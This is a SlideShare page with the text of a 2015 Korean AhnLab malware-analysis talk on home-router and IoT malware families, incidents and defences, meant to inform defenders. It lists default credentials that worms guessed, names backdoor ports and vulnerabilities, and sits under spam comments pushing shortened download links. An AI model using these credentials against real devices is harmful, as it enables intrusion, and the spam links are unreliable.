Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Embedded linux 악성코드 동향 20150323 v1.0 공개판

3,533 views

Published on

인터넷 공유기 중심의 Embedded Linux 악성코드 동향과 임베디드 리눅스와 연관된 IoT 얘기 살짝

Home Router malware

Published in: Technology
  • -- DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT -- ......................................................................................................................... ......................................................................................................................... Download FULL PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... (Unlimited)
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • -- DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT -- ......................................................................................................................... ......................................................................................................................... Download FULL PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... (Unlimited)
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • accessibility Books Library allowing access to top content, including thousands of title from favorite author, plus the ability to read or download a huge selection of books for your pc or smartphone within minutes ,Download or read Ebooks here ... ......................................................................................................................... Download FULL PDF EBOOK here { https://urlzs.com/UABbn }
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • -- DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT -- ......................................................................................................................... ......................................................................................................................... Download FULL PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... (Unlimited)
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THI5 BOOKS INTO AVAILABLE FORMAT (Unlimited) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... ACCESS WEBSITE for All Ebooks ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... ......................................................................................................................... ......................................................................................................................... .............. Browse by Genre Available eBooks ..................................................................................................................................... Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, CookeBOOK Crime, eeBOOK Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult,
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Embedded linux 악성코드 동향 20150323 v1.0 공개판

  1. 1. (Home Router 중심) IoT 악성코드 2015.03.20 (V1.0) – 공개용 안랩 시큐리티대응센터(ASEC) 분석팀 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) 책임 연구원 사실 Home Network Devices 중심 Embedded Linux 악성코드
  2. 2. © AhnLab, Inc. All rights reserved. 2 :~$apropos • IoT • EmbeddedLinux • Home Network • 주요 EmbeddedLinux악성코드 • Casestudy
  3. 3. © AhnLab, Inc. All rights reserved. 3 :~$whoami Profile − 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) − 1988년 1월 7일 : Apple ][+ 복제품으로 컴퓨터 시작 − 1989년 : Brain virus 변형 감염 − 1997년 : AhnLab 입사 − AhnLab 책임 연구원 (Senior Antivirus Researcher) − 시큐리티 대응센터(ASEC) 분석팀에서 악성코드 분석 및 연구 중 - 민간합동 조사단, 사이버보안 전문단 - AVED, AMTSO, vforum 멤버 - Wildlist Reporter
  4. 4. Contents 01 02 03 04 05 06 07 IoT 그리고 Embedded Linux Home Network 사건 사고 주요 악성코드 Case study 대응 방법과 한계 맺음말 및 전망
  5. 5. 01 IoT 그리고 Embedded Linux
  6. 6. © AhnLab, Inc. All rights reserved. 6 IoT (Internet of Things) • IoT - 사람과사물,사물과사물간정보를상호소통하는지능형기술및서비스 * Source:http://en.wikipedia.org/wiki/Internet_of_Things
  7. 7. © AhnLab, Inc. All rights reserved. 7 IoT (Internet of Things) • 활용 분야 - * Source:http://www.kpcb.com/blog/how-kleiner-perkins-invests-in-the-internet-of-things-picking-the-winners
  8. 8. © AhnLab, Inc. All rights reserved. 8 IoT (Internet of Things) 사생활 침해 훔쳐 보기 정보 유출 개인 정보 유출 데이터 조작 내부/통신 데이터 조작 의료 기기는 큰 문제 악성코드 감염 DDoS 공격 Bitcoin 채굴 등 보안 위협
  9. 9. © AhnLab, Inc. All rights reserved. IoT (Internet of Things) OS EmbededLinux iOS Windows Contiki Riot mbed Tizen
  10. 10. © AhnLab, Inc. All rights reserved. 10 IoT (Internet of Things) • Windows10 RaspberryPi2 지원 - * Source:http://www.raspberrypi.org/raspberry-pi-2-on-sale
  11. 11. © AhnLab, Inc. All rights reserved. 11 Embedded Linux • EmbeddedLinux - * Source:http://en.wikipedia.org/wiki/Linux_on_embedded_systems
  12. 12. 02 Home Network
  13. 13. © AhnLab, Inc. All rights reserved. 13 Home Network • Home Router - 인터넷공유기,Wi-FiRouter,WirelessRouter * Source:http://en.wikipedia.org/wiki/Wireless_router
  14. 14. © AhnLab, Inc. All rights reserved. 14 Home Network • SOC (System on a chip) - * Source:http://en.wikipedia.org/wiki/System_on_a_chip
  15. 15. © AhnLab, Inc. All rights reserved. 15 Home Network Home Router • 제품 사양 - MIPS -EmbeddedLinux * Source:http://www.iptime.co.kr&http://www.netcheif.com/Reviews/BR-6478AC/PDF/8197D.pdf
  16. 16. © AhnLab, Inc. All rights reserved. 16 Home Network Embedded Linux • Busybox - 주요Linux명령어를하나의파일에담음 * Source:http://www.busybox.net/
  17. 17. © AhnLab, Inc. All rights reserved. 17 Home Network Embedded Linux • Login - 공장출시기본Login/password
  18. 18. © AhnLab, Inc. All rights reserved. 18 Home Network Embedded Linux • BusyBox -
  19. 19. © AhnLab, Inc. All rights reserved. 19 Home Network Home Router • cpuinfo -
  20. 20. © AhnLab, Inc. All rights reserved. 20 Home Network Embedded Linux • Shellshock테스트 - 다행히취약점없음
  21. 21. 03 사건 사고
  22. 22. © AhnLab, Inc. All rights reserved. 22 드라마 속 IoT • 해킹을 통한 살인 - 말기암환자가 자동차,POS,엘리베이터를해킹해살해시도 * Source:CSI NewyorkSeason6Eipsode2(2009)
  23. 23. © AhnLab, Inc. All rights reserved. 23 설정 변경 • 인터넷 공유기 DNS 주소 변경 - 인터넷공유기보안취약점이용해DNS주소변경해유명사이트접속할때가짜웹사이트유도
  24. 24. © AhnLab, Inc. All rights reserved. 24 설정 변경 • 인터넷 공유기 DNS 주소 변경 - 인터넷공유기허점이용해악성코드감염시도 * source:http://www.krcert.or.kr/kor/data/secNoticeView.jsp?p_bulletin_writing_sequence=20950
  25. 25. © AhnLab, Inc. All rights reserved. 25 설정 변경 • 인터넷 공유기 제작 업체 - firmware업데이트권고 * source:http://www.iptime.co.kr/~iptime/bbs/view.php?id=notice&page=2&ffid=&fsid=&dffid=&dfsid=&dftid=&sn1=&divpage=1&dis_comp=&sn=off&ss= on&sc=on&select_arrange=headnum&desc=asc&dis_comp=&ng_value=&x_value=&no=812
  26. 26. © AhnLab, Inc. All rights reserved. 26 설정 변경 • Sality - Salityvirus가primaryDNS변경하는Rbrute설치 * Source:http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute29
  27. 27. © AhnLab, Inc. All rights reserved. 27 자료 변조 • sinology사의 NAS취약점 공격 - DSM4.3-3810orearlier취약점이용해내부보관파일암호화후돈요구ransomware등장 * source:http://www.synology.com/en-us/company/news/article/470
  28. 28. © AhnLab, Inc. All rights reserved. 28 Backdoor • Netisrouter 내 Backdoor포함 - UDP53413이용 * source:http://www.netiskorea.com/atboard_view.php?grp1=news&grp2=notice&uid=9034
  29. 29. © AhnLab, Inc. All rights reserved. 29 Backdoor • Netisrouter 내 Backdoor포함 - NetisKorea에서국내제품에는Backdoor존재하지않음공지 * source:http://www.netiskorea.com/atboard_view.php?grp1=news&grp2=notice&uid=9034
  30. 30. © AhnLab, Inc. All rights reserved. 30 DDoS • 인터넷 장애 발생 - 2014년11월29일오전SK브로드밴드와LG유플러스DNS서버에대한공격발생 * Source:http://www.zdnet.co.kr/news/news_view.asp?artice_id=20141129202907&type=xml
  31. 31. © AhnLab, Inc. All rights reserved. 31 DDoS • Home Router이용한 DDoS공격 -2014년크리스마스때LizardSquad의Microsoft’sXboxlive,SonyPlayStationNetwork공격 * Source:http://krebsonsecurity.com/2015/01/lizard-stresser-runs-on-hacked-home-routers/
  32. 32. 04 주요 악성코드
  33. 33. © AhnLab, Inc. All rights reserved. Timeline 2009 Aidra Gafgyt (Fgt) Uteltend(Knb, Chuck Norris) 2010 20122008 2013 2014 2015 Darlloz Uteltend(Knb, Chuck Norris 2)Psybot Themoon Moose Baswool 2011 Hydra
  34. 34. © AhnLab, Inc. All rights reserved. 34 Hydra • Hydra -2011년4월공개된IRCbot -2008년부터undergroundforums에서존재 -D-Link장비취약점이용 * Source:http://baume.id.au/psyb0t/PSYB0T.pdf
  35. 35. © AhnLab, Inc. All rights reserved. 35 Psybot • Psybot - 2009년1월TerryBaume발견 * Source:http://baume.id.au/psyb0t/PSYB0T.pdf
  36. 36. © AhnLab, Inc. All rights reserved. 36 Psybot • Psybot - 첫inthewild.DDoS공격에이용 * Source:http://www.dronebl.org/blog/8
  37. 37. © AhnLab, Inc. All rights reserved. 37 Psybot • Psybot -MIPSLinux악성코드 -UPX로압축
  38. 38. © AhnLab, Inc. All rights reserved. 38 Uteltend (Chuck Norris, Knb) • ChuckNorrisBotnet -2009년말Czech의Masaryk대학에서발견 -MIPSLinuxIRCbot -TELNETbruteforceattack * Source:http://www.muni.cz/research/projects/4622/web/chuck_norris._botnet
  39. 39. © AhnLab, Inc. All rights reserved. 39 Uteltend (Chuck Norris, Knb) • ChuckNorrisBotnet -Sourcecode내이탈리아어‘[R]angerKillato:innomediChuckNorris!’존재 -knb-mipsUPX해제하면‘KnbKeepnickbot0.2.2’문자열존재
  40. 40. © AhnLab, Inc. All rights reserved. 40 Uteltend (Chuck Norris, Knb) • 파일 구성 - 설정파일 - IRCBot+DDoS공격도구 -password
  41. 41. © AhnLab, Inc. All rights reserved. 41 Uteltend (Chuck Norris, Knb) • 파일 구성 - Kaiten(Tsunami)DDoS공격도구포함
  42. 42. © AhnLab, Inc. All rights reserved. 42 Aidra (Lightaidra) • 악성 IRCbot - 2012년2월발견.국내에도감염보고 -DDoS공격 * Source:http://www.fitsec.com/blog/index.php/2012/02/19/new-piece-of-malicious-code-infecting-routers-and-iptvs/
  43. 43. © AhnLab, Inc. All rights reserved. 43 Aidra (Lightaidra) getbinaries.sh ARM MIPS MIPSEL Power PC SuperH script
  44. 44. © AhnLab, Inc. All rights reserved. 44 Aidra (Lightaidra) • Aidravs Darlloz - 경쟁관계인Darlloz제거기능 추가 * Source:http://now.avg.com/war-of-the-worms/
  45. 45. © AhnLab, Inc. All rights reserved. 45 Darlloz (Zollard) • Darlloz -2013년10월발견된InternetofThings감염worm -x86,MIPS,ARM,PowerPC감염 -가상화폐채굴기능추가 * source:http://www.symantec.com/connect/blogs/iot-worm-used-mine-cryptocurrency
  46. 46. © AhnLab, Inc. All rights reserved. 46 Darlloz (Zollard) • 감염 -전세계31,000대시스템감염추정 -국내시스템이전체감염중17%차지 * source:http://www.symantec.com/connect/blogs/iot-worm-used-mine-cryptocurrency
  47. 47. © AhnLab, Inc. All rights reserved. Darlloz (Zollard) script armeabi arm Power PC MIPS mipsel x86
  48. 48. © AhnLab, Inc. All rights reserved. 48 Darlloz (Zollard) • Darlloz -PHP취약점php-cgiInformationDisclosureVulnerability(CVE-2012-1823)이용 -router,set-topboxes암호추측:dreambox,vizxv,stemroot,sysadmin,superuser,1234,12345,1111,smcadmin
  49. 49. © AhnLab, Inc. All rights reserved. 49 Darlloz (Zollard) • Darlloz - 시스템에맞는cpuminer 다운로드후설치해Mincoins,Dogecoins,Bitcoins등가상화폐채굴
  50. 50. © AhnLab, Inc. All rights reserved. 50 Themoon • Themoon - 2014년2월13일발견 -LinksysHomerouter취약점이용해감염 * Source:https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633
  51. 51. © AhnLab, Inc. All rights reserved. 51 Themoon • Themoon - Strings
  52. 52. © AhnLab, Inc. All rights reserved. 52 Themoon • Themoon - 포함된PNG이미지
  53. 53. © AhnLab, Inc. All rights reserved. 53 Gafgyt (Bashlite.SMB, Fgt) • Gafgyt (Bashlite.SMB,Fgt) - TrendMicro에서BusyBox이용한Bashlite로소개 * Source:http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/
  54. 54. © AhnLab, Inc. All rights reserved. 54 Gafgyt (Bashlite.SMB, Fgt) • Gafgyt (Bashlite.SMB,Fgt) - Dr.Web정보공개 * Source:https://news.drweb.com/show/?i=7092&lng=en
  55. 55. © AhnLab, Inc. All rights reserved. 55 Gafgyt (Bashlite.SMB, Fgt) • Gafgyt (Bashlite.SMB,Fgt) -이미최소2014년8월부터존재 -2014년11월24일MicrosoftDDoS공격에이용 -2014년말게임사이트DDoS공격한Lizard'sStresser에이용 -2015년1월Sourcecode공개 -Sourcecode공개로다양한변형제작중
  56. 56. © AhnLab, Inc. All rights reserved. 56 Gafgyt (Bashlite.SMB, Fgt) • 기능 * Source:http://vms.drweb.com/virus/?i=4242198
  57. 57. © AhnLab, Inc. All rights reserved. 57 Gafgyt (Bashlite.SMB, Fgt) • bin.sh * Source:http://vms.drweb.com/virus/?i=4242198
  58. 58. © AhnLab, Inc. All rights reserved. 58 Moose • Moose - 최소2014년10월부터활동시작한BitCoin채굴 -ARM,MIPS버전존재 -국내HomeRouter에서도발견
  59. 59. © AhnLab, Inc. All rights reserved. 59 Baswool • Baswool - 2014년11월국내발견확인 -Bashwoop(Powbot)과유사
  60. 60. © AhnLab, Inc. All rights reserved. 60 Baswool • 변형 - Virustotal에2014년12월9일최초접수 -주요문자열암호화 * md5:331596b415ce2228e596cda400d8bfd2
  61. 61. 05 Case study
  62. 62. 06 대응 방법과 한계
  63. 63. © AhnLab, Inc. All rights reserved. 현재 문제점 Antivirus 프로그램 부재 • Antivirus를 포함한 별다른 보안 프로그램 없음 • 특성상 백신 및 전용 백신 배포 어려움 • 현재 사용자가 직접 설치해 야 함 악성코드 제거 • 수동 제거 해야 함 • 가정 방문해 제거 ! (가가호 호 !) Firmware Update • 사용자가 직접 업데이트 • 얼마나 많은 사람이 Firmware Update 를 ?!
  64. 64. © AhnLab, Inc. All rights reserved. 64 정부 대책 • 미래부 인터넷 공유기 보안 강화 발표 -2015년6월:인터넷공유기의실시간모니터링시스템구축 -2015년7월:공유기보안업데이트체계구축·운영 * Source:http://www.ddaily.co.kr/news/article.html?no=127945
  65. 65. © AhnLab, Inc. All rights reserved. 65 정부 대책 • 반응 - * Source:http://www.clien.net/cs2/bbs/board.php?bo_table=news&wr_id=1953579
  66. 66. © AhnLab, Inc. All rights reserved. 66 정부 대책 • 반응 - * Source:http://cafe.naver.com/malzero
  67. 67. © AhnLab, Inc. All rights reserved. 67 정부 대책 • 반응 - * Source: http://www.iptime.co.kr/~iptime/bbs/view.php?id=notice&page=1&ffid=&fsid=&dffid=&dfsid=&dftid=&sn1=&divpage=1&dis_comp=&sn=off&ss=on&sc= on&select_arrange=headnum&desc=asc&dis_comp=&ng_value=&x_value=&no=915
  68. 68. © AhnLab, Inc. All rights reserved. 68 현재 문제점 • 분석가 입장 - EmbededLinuxLinux경험부족 - ARM/MIPSProcessor경험부족 -Hardwaredebugging경험부족 -수많은IoT에대한분석능력필요?!
  69. 69. 07 맺음말 및 전망
  70. 70. © AhnLab, Inc. All rights reserved. 70 Wrap up • 이미 많은 공유기 악성코드 존재 - 2009년부터공격시작되었지만우리는너무몰랐네… • Study! - ARM,MIPS -EmbeddedLinux -Hardwaredebugging등
  71. 71. © AhnLab, Inc. All rights reserved. 71 MIPS • What the hell?! -생소한명령어 -색다른syscall방식 -아직Hex-raysdecompiler미지원
  72. 72. © AhnLab, Inc. All rights reserved. 72 Vulnerabilities • Smart Home 분석 -온도조절장치,스마트잠금장치,스마트전구,스마트연기감지기,스마트에너지관리기기,스마트허브등50가 지분석 * Source:http://www.symantec.com/connect/blogs/iot-smart-home-giving-away-keys-your-kingdom
  73. 73. © AhnLab, Inc. All rights reserved. 73 Vulnerabilities • 계속 발견되는 취약점 - * Source:https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2
  74. 74. © AhnLab, Inc. All rights reserved. 74 Vulnerabilities • 계속 발견되는 취약점 - * Source:https://beyondbinary.io/advisory/seagate-nas-rce
  75. 75. © AhnLab, Inc. All rights reserved. 75 현재의 보안 문제 • Not reallya fair fight * source:http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
  76. 76. © AhnLab, Inc. All rights reserved. 76 현재의 보안 문제 • 모두가 함께 해야 하는 보안 * source:http://www.security-marathon.be/?p=1786
  77. 77. © AhnLab, Inc. All rights reserved. 77 Q&A email : minseok.cha@ahnlab.com / mstoned7@gmail.com http://xcoolcat7.tistory.com https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
  78. 78. © AhnLab, Inc. All rights reserved. 78 Reference • Marta Janus/Kaspersky,‘Headsof the Hydra. Malwarefor Network Devices’, 2011 (http://securelist.com/analysis/36396/heads-of-the-hydra-malware-for-network- devices/?replyto=15081&tree=0) • Marta Janus/Kaspersky,‘Stateof play: network devicesfacingbulls-eye’,2014 (http://securelist.com/blog/research/67794/state-of-play-network-devices-facing-bulls-eye) • 손기종/공유기 공격 사례를 통한 사물인터넷 기기 보안 위협, 2015 • 장영준/Samsung(Personal Communication) • 류소준 (Ryu Sojun)/KISA(Personal Communication) • 신동은 (ShinDongeun)/KISA(PersonalCommunication) • 조인중 (Cho Injoong)/SKBroadband(PersonalCommunication)
  79. 79. D E S I G N Y O U R S E C U R I T Y

×